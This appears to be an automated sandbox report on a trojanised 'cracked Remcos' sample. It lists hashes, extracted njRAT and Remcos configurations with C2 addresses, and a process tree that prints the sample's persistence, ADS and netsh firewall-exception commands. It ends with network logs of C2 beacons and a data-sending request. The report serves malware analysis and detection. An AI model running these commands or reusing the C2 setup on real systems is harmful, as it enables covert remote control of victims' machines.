Resubmissions

21/02/2025, 18:31 UTC

250221-w6e2asxpbm 10

21/02/2025, 17:35 UTC

250221-v6f3xswrbm 10

Analysis

  • max time kernel
    899s
  • max time network
    901s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250217-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    21/02/2025, 17:35 UTC

General

  • Target

    Remcos Professional Cracked By Alcatraz3222/Remcos Professional Cracked By Alcatraz3222.exe

  • Size

    17.7MB

  • MD5

    efc159c7cf75545997f8c6af52d3e802

  • SHA1

    b85bd368c91a13db1c5de2326deb25ad666c24c1

  • SHA256

    898ac001d0f6c52c1001c640d9860287fdf30a648d580e9f5dd15e2ef84ab18e

  • SHA512

    d06a432233dceb731defd53238971699fef201d0f9144ee50e5dd7d6620dfdd6c298d52618bf2c9feb0519574f4565fb0177b00fd8292768fbd8b85dd11e650d

  • SSDEEP

    393216:GYuGvp8EHb+in8f4Zg41+Q4AXf5ZZcyfHDMxVpSc+q+eOFxdx:3mqSi8fN4sAXfrZcyfo7p0eYHx

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

C2

dllsys.duckdns.org:3202

Mutex

3b570ffeeb3d34249b9a5ce0ee58a328

Attributes
  • reg_key

    3b570ffeeb3d34249b9a5ce0ee58a328

  • splitter

    svchost

Extracted

Family

remcos

Version

2.2.0 Light

Botnet

RemoteHost

C2

127.0.0.1:8124

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    3

  • copy_file

    remcos.exe

  • copy_folder

    remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Remcos-1OKHE7

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • Hawkeye family
  • Njrat family
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222\Remcos Professional Cracked By Alcatraz3222.exe
    "C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222\Remcos Professional Cracked By Alcatraz3222.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4952
    • C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222.exe
      "C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      PID:3252
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy "C:/Users/Admin/AppData/Local/Temp/Remcos Professional Cracked By Alcatraz3222/Remcos Professional Cracked By Alcatraz3222.exe" "%temp%\Profile Remcos\Update_Lock_Remcos.exe" /Y
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1752
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%temp%\Profile Remcos\Update_Lock_Remcos.exe.lnk" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3080
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Profile Remcos\Update_Lock_Remcos.exe.lnk" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2820
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo [zoneTransfer]ZoneID = 2 > %temp%\Profile Remcos\Update_Lock_Remcos.exe:Zone.Identifier
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3688
    • C:\Users\Admin\AppData\Local\Temp\taskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\taskhost.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3212
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\taskhost.exe" "taskhost.exe" ENABLE
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:3864
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1172
    • C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222.exe
      "C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222.exe"
      1⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      PID:4572
    • C:\Users\Admin\Desktop\remcos_agent.exe
      "C:\Users\Admin\Desktop\remcos_agent.exe"
      1⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4680
      • C:\Windows\SysWOW64\dxdiag.exe
        "C:\Windows\System32\dxdiag.exe" /t C:\Users\Admin\AppData\Local\Temp\sysinfo.txt
        2⤵
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:1616
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\uninstall.vbs"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:4716
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x4ac 0x32c
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1636

    Network

    • flag-us
      DNS
      breakingsec02.co.nf
      Remcos Professional Cracked By Alcatraz3222.exe
      Remote address:
      8.8.8.8:53
      Request
      breakingsec02.co.nf
      IN A
      Response
      breakingsec02.co.nf
      IN CNAME
      91498.bodis.com
      91498.bodis.com
      IN A
      199.59.243.228
    • flag-us
      GET
      http://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6E756C6C65746865626561737440676D61696C2E636F6D0A0A53
      Remcos Professional Cracked By Alcatraz3222.exe
      Remote address:
      199.59.243.228:80
      Request
      GET /Remcos/logaccess.php?DATA=322E322E30204C696768740A6E756C6C65746865626561737440676D61696C2E636F6D0A0A53 HTTP/1.1
      User-Agent: REMCOS
      Host: breakingsec02.co.nf
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      date: Fri, 21 Feb 2025 17:36:33 GMT
      content-type: text/html; charset=utf-8
      content-length: 1310
      x-request-id: 6db63d02-8ae4-4556-b338-e1a97b76d62d
      cache-control: no-store, max-age=0
      accept-ch: sec-ch-prefers-color-scheme
      critical-ch: sec-ch-prefers-color-scheme
      vary: sec-ch-prefers-color-scheme
      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OCJLnlCnnm9Z2QfXZafji9TuGsNddj5776lO8Pt0jCVgJS9dZEaKQrofNwYprbMHhp4v21TMIrzaFR1DIQ2D9A==
      set-cookie: parking_session=6db63d02-8ae4-4556-b338-e1a97b76d62d; expires=Fri, 21 Feb 2025 17:51:34 GMT; path=/
    • flag-us
      GET
      http://breakingsec02.co.nf/Remcos/upd_free.txt
      Remcos Professional Cracked By Alcatraz3222.exe
      Remote address:
      199.59.243.228:80
      Request
      GET /Remcos/upd_free.txt HTTP/1.1
      User-Agent: REMCOS
      Host: breakingsec02.co.nf
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      date: Fri, 21 Feb 2025 17:36:33 GMT
      content-type: text/html; charset=utf-8
      content-length: 1086
      x-request-id: a63f3675-8e77-480f-a271-ea8c867ee142
      cache-control: no-store, max-age=0
      accept-ch: sec-ch-prefers-color-scheme
      critical-ch: sec-ch-prefers-color-scheme
      vary: sec-ch-prefers-color-scheme
      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Q9tWON6xJOhM/gmfLyztOYqHCXUUH02QeHHTvshYw/jwYIOjvFAmWfVR32l39xkIwPjNLjgAujOhOAKSmmRWmg==
      set-cookie: parking_session=a63f3675-8e77-480f-a271-ea8c867ee142; expires=Fri, 21 Feb 2025 17:51:34 GMT; path=/
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
    • flag-us
      GET
      http://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6164536461647364406465657A2E636F6D0A0A53
      Remcos Professional Cracked By Alcatraz3222.exe
      Remote address:
      199.59.243.228:80
      Request
      GET /Remcos/logaccess.php?DATA=322E322E30204C696768740A6164536461647364406465657A2E636F6D0A0A53 HTTP/1.1
      User-Agent: REMCOS
      Host: breakingsec02.co.nf
      Cache-Control: no-cache
      Cookie: parking_session=a63f3675-8e77-480f-a271-ea8c867ee142
      Response
      HTTP/1.1 200 OK
      date: Fri, 21 Feb 2025 17:38:07 GMT
      content-type: text/html; charset=utf-8
      content-length: 1278
      x-request-id: 40a736f6-2089-4aa6-9b21-0f381e82a024
      cache-control: no-store, max-age=0
      accept-ch: sec-ch-prefers-color-scheme
      critical-ch: sec-ch-prefers-color-scheme
      vary: sec-ch-prefers-color-scheme
      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yCKBgQsz/sDNzDvHMFQPC2FM2a9XOIuJ4iFvdnemSflIZwlsy/MdHlNISvcKCNnJGGLP6dEujbqGxhLvzWGEVw==
      set-cookie: parking_session=a63f3675-8e77-480f-a271-ea8c867ee142; expires=Fri, 21 Feb 2025 17:53:07 GMT
    • flag-us
      GET
      http://breakingsec02.co.nf/Remcos/upd_free.txt
      Remcos Professional Cracked By Alcatraz3222.exe
      Remote address:
      199.59.243.228:80
      Request
      GET /Remcos/upd_free.txt HTTP/1.1
      User-Agent: REMCOS
      Host: breakingsec02.co.nf
      Cache-Control: no-cache
      Cookie: parking_session=a63f3675-8e77-480f-a271-ea8c867ee142
      Response
      HTTP/1.1 200 OK
      date: Fri, 21 Feb 2025 17:38:07 GMT
      content-type: text/html; charset=utf-8
      content-length: 1086
      x-request-id: e0727444-5ecc-48d5-916e-a79094d2c033
      cache-control: no-store, max-age=0
      accept-ch: sec-ch-prefers-color-scheme
      critical-ch: sec-ch-prefers-color-scheme
      vary: sec-ch-prefers-color-scheme
      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Q9tWON6xJOhM/gmfLyztOYqHCXUUH02QeHHTvshYw/jwYIOjvFAmWfVR32l39xkIwPjNLjgAujOhOAKSmmRWmg==
      set-cookie: parking_session=a63f3675-8e77-480f-a271-ea8c867ee142; expires=Fri, 21 Feb 2025 17:53:07 GMT
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      www.geoplugin.net
      Remcos Professional Cracked By Alcatraz3222.exe
      Remote address:
      8.8.8.8:53
      Request
      www.geoplugin.net
      IN A
      Response
      www.geoplugin.net
      IN CNAME
      geoplugin.net
      geoplugin.net
      IN A
      178.237.33.50
    • flag-nl
      DNS
      Remcos Professional Cracked By Alcatraz3222.exe
      Remote address:
      178.237.33.50:80
      Response
      HTTP/1.1 400 Bad request
      content-length: 90
      cache-control: no-cache
      content-type: text/html
      connection: close
    • flag-nl
      GET
      http://www.geoplugin.net/json.gp?ip=127.0.0.1
      Remcos Professional Cracked By Alcatraz3222.exe
      Remote address:
      178.237.33.50:80
      Request
      GET /json.gp?ip=127.0.0.1 HTTP/1.1
      Host: www.geoplugin.net
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      date: Fri, 21 Feb 2025 17:39:07 GMT
      server: Apache
      content-length: 894
      content-type: application/json; charset=utf-8
      cache-control: public, max-age=300
      access-control-allow-origin: *
    • flag-us
      DNS
      fd.api.iris.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      fd.api.iris.microsoft.com
      IN A
      Response
      fd.api.iris.microsoft.com
      IN CNAME
      fd-api-iris.trafficmanager.net
      fd-api-iris.trafficmanager.net
      IN CNAME
      iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
      iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
      IN A
      20.223.35.26
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • flag-us
      DNS
      dllsys.duckdns.org
      taskhost.exe
      Remote address:
      8.8.8.8:53
      Request
      dllsys.duckdns.org
      IN A
      Response
      dllsys.duckdns.org
      IN A
      84.220.8.178
    • 199.59.243.228:80
      http://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6E756C6C65746865626561737440676D61696C2E636F6D0A0A53
      http
      Remcos Professional Cracked By Alcatraz3222.exe
      612 B
      3.0kB
      9
      6

      HTTP Request

      GET http://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6E756C6C65746865626561737440676D61696C2E636F6D0A0A53

      HTTP Response

      200
    • 199.59.243.228:80
      http://breakingsec02.co.nf/Remcos/upd_free.txt
      http
      Remcos Professional Cracked By Alcatraz3222.exe
      523 B
      2.6kB
      9
      6

      HTTP Request

      GET http://breakingsec02.co.nf/Remcos/upd_free.txt

      HTTP Response

      200
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 199.59.243.228:80
      http://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6164536461647364406465657A2E636F6D0A0A53
      http
      Remcos Professional Cracked By Alcatraz3222.exe
      714 B
      2.9kB
      10
      5

      HTTP Request

      GET http://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6164536461647364406465657A2E636F6D0A0A53

      HTTP Response

      200
    • 199.59.243.228:80
      http://breakingsec02.co.nf/Remcos/upd_free.txt
      http
      Remcos Professional Cracked By Alcatraz3222.exe
      643 B
      2.5kB
      10
      5

      HTTP Request

      GET http://breakingsec02.co.nf/Remcos/upd_free.txt

      HTTP Response

      200
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 178.237.33.50:80
      www.geoplugin.net
      http
      Remcos Professional Cracked By Alcatraz3222.exe
      236 B
      339 B
      5
      3

      HTTP Response

      400
    • 178.237.33.50:80
      http://www.geoplugin.net/json.gp?ip=127.0.0.1
      http
      Remcos Professional Cracked By Alcatraz3222.exe
      410 B
      1.3kB
      7
      4

      HTTP Request

      GET http://www.geoplugin.net/json.gp?ip=127.0.0.1

      HTTP Response

      200
    • 127.0.0.1:8124
      remcos_agent.exe
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 127.0.0.1:8124
      remcos_agent.exe
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 20.223.35.26:443
      fd.api.iris.microsoft.com
      98 B
      52 B
      2
      1
    • 127.0.0.1:8124
      remcos_agent.exe
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 127.0.0.1:8124
      remcos_agent.exe
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 127.0.0.1:8124
      remcos_agent.exe
    • 127.0.0.1:8124
      remcos_agent.exe
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 84.220.8.178:3202
      dllsys.duckdns.org
      taskhost.exe
      260 B
      5
    • 8.8.8.8:53
      breakingsec02.co.nf
      dns
      Remcos Professional Cracked By Alcatraz3222.exe
      65 B
      110 B
      1
      1

      DNS Request

      breakingsec02.co.nf

      DNS Response

      199.59.243.228

    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      192 B
      208 B
      3
      3

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Response

      84.220.8.178

    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      192 B
      80 B
      3
      1

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Response

      84.220.8.178

    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      128 B
      160 B
      2
      2

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Response

      84.220.8.178

      DNS Response

      84.220.8.178

    • 8.8.8.8:53
      www.geoplugin.net
      dns
      Remcos Professional Cracked By Alcatraz3222.exe
      63 B
      93 B
      1
      1

      DNS Request

      www.geoplugin.net

      DNS Response

      178.237.33.50

    • 8.8.8.8:53
      fd.api.iris.microsoft.com
      dns
      71 B
      197 B
      1
      1

      DNS Request

      fd.api.iris.microsoft.com

      DNS Response

      20.223.35.26

    • 8.8.8.8:53
      dllsys.duckdns.org
      dns
      taskhost.exe
      192 B
      144 B
      3
      2

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Request

      dllsys.duckdns.org

      DNS Response

      84.220.8.178

